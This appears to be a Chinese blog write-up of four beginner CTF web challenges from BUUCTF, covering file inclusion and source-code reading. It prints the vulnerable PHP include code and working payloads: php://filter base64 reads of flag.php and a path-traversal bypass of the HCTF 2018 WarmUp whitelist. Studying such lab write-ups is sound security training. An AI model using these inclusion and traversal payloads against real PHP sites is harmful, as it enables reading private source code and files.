本文已参与「新人创作礼」活动,一起开启掘金创作之路。
[ACTF2020 新生赛]Include
题目提示了是文件包含类型的题,我们点击TIPS
考虑到flag藏在flag.php里
我们要读取源码,联想到之前学习时文件包含中对伪协议的利用构造payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
得出了
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MjA5ZGNmZmMtOTVkNy00NTM5LTg4YmMtZGU4ZjJkMWM4MDQ3fQo=
直接base64转码
flag{209dcffc-95d7-4539-88bc-de8f2d1c8047}
[极客大挑战 2019]Havefun
打开网页是个图片没有任何代码,F12查看
获取一个CAT参数,若cat=dog那么就返回Syc{cat_cat_cat_cat}
我们构造
?cat=dog
出来了FLAG: flag{5a558739-30b0-4b2c-9257-508f5f7a0494}
[极客大挑战 2019]Secret File
打开发现就是一个网页,没啥提示,所以F12查看一下
发现提示
http://d69343e1-7e99-4108-8556-da4ba3e79eb4.node4.buuoj.cn/Archive_room.php
进去后有个按钮,点击后也没啥
根据所说的提示,怀疑跳转时有啥秘密,用BP抓下包
发现秘密
<html>
<!--
secr3t.php
-->
</html>
打开这个PHP文件
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
尝试访问下flag.php
弹出个网页说我就在这里,此路行不通
那我们看代码,过滤了../,tp,input
所以我们尝试下file伪协议进行文件读取
构造payload
http://d69343e1-7e99-4108-8556-da4ba3e79eb4.node4.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
出了个BASE64解码
$flag = 'flag{e7cb31bd-65b9-42fb-a0f5-87e831710500}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
[HCTF 2018]WarmUp
开局F12发现source.php进入
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" />";
}
?>
由于代码里提示了hint.php我们先查看下
flag not here, and flag in ffffllllaaaagggg
考虑到FLAG在在里面 ffffllllaaaagggg
回到代码,
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" />";
}
?>
限定了传入file的值,//不能为空,是字符串,满足checkFile,要不返回图片
南无我们看下checkfiles函数
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it"; //要求为字符串
return false;
}
if (in_array($page, $whitelist)) {
return true; //要求在白名单
}
$_page = mb_substr(//该代码表示截取$page中'?'前部分,若无则截取整个$page
$page,
0,
mb_strpos($page . '?', '?')
);
、
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
); //
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
于是我们构造payload
file=hint.php?ffffllllaaaagggg
发现并没有ECHO 错误,成功绕过,但也没返回flag
猜测flag不在该目录下面,所以加../试一试
最终payload
http://3086897e-fc5a-45d4-badc-6ecfc37581c3.node4.buuoj.cn/source.php?file=hint.php?../../../../../ffffllllaaaagggg
